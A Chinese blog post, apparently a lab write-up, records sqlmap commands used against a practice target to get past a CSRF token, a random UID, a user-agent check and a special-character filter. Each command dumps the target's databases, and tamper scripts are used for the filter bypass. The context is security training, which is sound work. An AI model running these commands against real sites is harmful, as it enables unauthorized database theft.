SQLMap绕过 Web 应用程序保护靶机(打靶记录)

jun~2025-09-26 15:24

CSRF Protection (Case #8)

sqlmap -u "http://10.22.63.5/case8.php" \

--data="t0ken=cbb99235479c0d1610c441fdf72ebd4dd3f8f8e2e95c66aeebf2018b3e087dae&id=3" \

--csrf-token="t0ken" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--level=3 \

--risk=2 \

--batch --dump-all

Random UID Protection (Case #9)

sqlmap -u "http://10.22.63.5/case9.php?id=1\&uid=1234567890" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--batch --dump-all

User-Agent Protection (Case #10)

sqlmap -u "http://10.22.63.5/case10.php" \

--data="id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--random-agent \

--batch --dump-all

Special Character Filter (Case #11)

┌──(kali㉿kali)-[~]

└─$ sqlmap -u "http://10.22.63.5/case11.php?id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--tamper="between,space2comment" \

-D nextcyber \

--dump \

--batch

相关推荐
FreeBuf_1 小时前
Spring两大漏洞可导致泄露敏感信息及安全防护绕过(CVE-2025-41253/41254)
java·安全·spring
江公望1 小时前
Qt的QT_QPA_EGLFS_INTEGRATION环境变量浅解
linux·qt·qml
明月5661 小时前
github开源笔记应用程序项目推荐-Joplin
笔记·开源·joplin·跨平台笔记应用
YuCaiH2 小时前
网络编程的基础知识
linux·笔记·嵌入式·网络通信
m0_689618282 小时前
突破亚微米光电子器件制造瓶颈!配体交换辅助打印技术实现全打印红外探测器
笔记·制造
Siren_dream2 小时前
在VMware上运行Linux(我选择的是Ubuntu)
linux·运维·ubuntu
☆璇2 小时前
【Linux】Socket编程UDP
linux·网络·udp
涤生z2 小时前
list.
开发语言·数据结构·c++·学习·算法·list
南一Nanyi2 小时前
才知道 DNS 还能基于 HTTPS 实现!
网络协议·安全·面试
嵌入式小能手3 小时前
飞凌嵌入式ElfBoard-Vim编辑器之Vim常用操作命令
linux·编辑器·vim
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答05Linux下V2Ray安装配置指南06KGG转MP3工具|非KGM文件|解密音频07GitLab 零基础入门指南:从安装到项目管理全流程08荣耀手机2025年10月发布的新品Magic8比起Magic7,在硬件、性能、价格等上有什么区别,有什么优势09windows找不到gpedit.msc(本地组策略编辑器)102025软件测试面试八股文(含答案+文档)